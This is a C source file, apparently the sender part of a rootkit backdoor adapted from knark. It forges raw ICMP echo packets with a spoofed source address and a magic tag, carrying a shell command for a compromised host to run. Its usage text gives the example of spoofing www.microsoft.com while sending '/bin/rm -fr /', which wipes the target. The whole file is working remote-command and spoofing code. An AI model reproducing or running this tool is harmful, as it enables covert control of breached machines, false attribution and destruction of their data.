/*
 * oh gosh i should recode that .. (ripped from knark) 
 */

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <time.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define ICMP_TAG 0x0deadbee
#define SPACE_REPLACEMENT 254

#define ICMP_H sizeof(struct icmphdr)
#define IP_H sizeof(struct ip)


void
usage(const char *progname)
{
    fprintf(stderr,
	    "Usage:\n"
	    "\t%s <src_addr> <dst_addr> <command> [args ...]\n"
	    "ex: %s www.microsoft.com 192.168.1.77 /bin/rm -fr /\n",
	    progname, progname);
    exit(-1);
}

unsigned short in_cksum (unsigned short *ptr, int nbytes)
{
  register unsigned int sum;
  unsigned short oddbyte;
  register unsigned short answer;

  sum = 0;
  while (nbytes > 1)
  {
    sum += *ptr++;
    nbytes -= 2;
  }

  if (nbytes == 1) 
  {
    oddbyte = 0;
    *((unsigned char *) &oddbyte) = *(unsigned char *)ptr;
    sum += oddbyte;
  }

  sum  = (sum >> 16) + (sum & 0xffff);
  sum += (sum >> 16);
  answer = ~sum;
  return(answer);
}


int
open_raw_sock(void)
{
    int             s,
                    on = 1;

    if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
	perror("SOCK_RAW"), exit(-1);

    if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) == -1)
	perror("IP_HDRINCL"), exit(-1);

    return s;
}


struct in_addr
resolv(char *hostname)
{
    struct in_addr  in;
    struct hostent *hp;

    if ((in.s_addr = inet_addr(hostname)) == -1) {
	if ((hp = gethostbyname(hostname)))
	    bcopy(hp->h_addr, &in.s_addr, hp->h_length);
	else {
	    herror("Can't resolv hostname");
	    exit(-1);
	}
    }

    return in;
}

int
udp_send_rexec(int s,
	       struct in_addr *src,
	       struct in_addr *dst, u_char * buf, u_short datalen)
{
    u_char         *packet,
                   *data,
                   *p;
    struct ip      *ip;
    struct icmphdr *icmp;
    u_short         psize;
    struct sockaddr_in sin;

    psize = IP_H + ICMP_H + sizeof(u_long) + datalen;
    if ((packet = calloc(1, psize)) == NULL)
	perror("calloc"), exit(-1);

    ip = (struct ip *) packet;
    icmp = (struct icmphdr *) (packet + IP_H);
    data = (u_char *) (packet + IP_H + ICMP_H);

    srand(time(NULL));

    bzero(&sin, sizeof(sin));
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = dst->s_addr;

    ip->ip_hl = IP_H >> 2;
    ip->ip_v = IPVERSION;
    ip->ip_len = htons(psize);
    ip->ip_id = ~rand() & 0xffff;
    ip->ip_ttl = 63;
    ip->ip_p = IPPROTO_ICMP;
    ip->ip_src.s_addr = src->s_addr;
    ip->ip_dst.s_addr = dst->s_addr;

    icmp->type = 8;
    icmp->code = 0;
    icmp->checksum = 0x0000;

    p = data;
    *(u_long *) p = ICMP_TAG;
    p += sizeof(u_long);
    memcpy(p, buf, datalen);

    icmp->checksum = in_cksum((unsigned short*)icmp, 
                       ICMP_H + datalen + sizeof(u_long));

    if (sendto(s, packet, psize, 0, (struct sockaddr *) &sin, sizeof(sin))
	== -1) perror("sendto"), exit(-1);

    return psize;
}


int
main(int argc, char *argv[])
{
    int             s,
                    i,
                    len;
    u_char          cmd[IP_MSS];
    struct in_addr  src,
                    dst;


    if (argc < 4)
	usage(argv[0]);

    src = resolv(argv[1]);
    dst = resolv(argv[2]);

    s = open_raw_sock();

    len = snprintf(cmd, IP_MSS, "%s", argv[3]);
    for (i = 4; i < argc && len < IP_MSS; i++)
	len += snprintf(cmd + len, IP_MSS - len, "%c%s", SPACE_REPLACEMENT,
			argv[i]);
    cmd[len] = '\0';

    udp_send_rexec(s, &src, &dst, cmd, len);
    for (i = 0; cmd[i]; i++)
	if (cmd[i] == SPACE_REPLACEMENT)
	    cmd[i] = ' ';
    printf("Done. exec \"%s\" requested on %s from %s\n",
	   cmd, argv[2], argv[1]);

    exit(0);
}
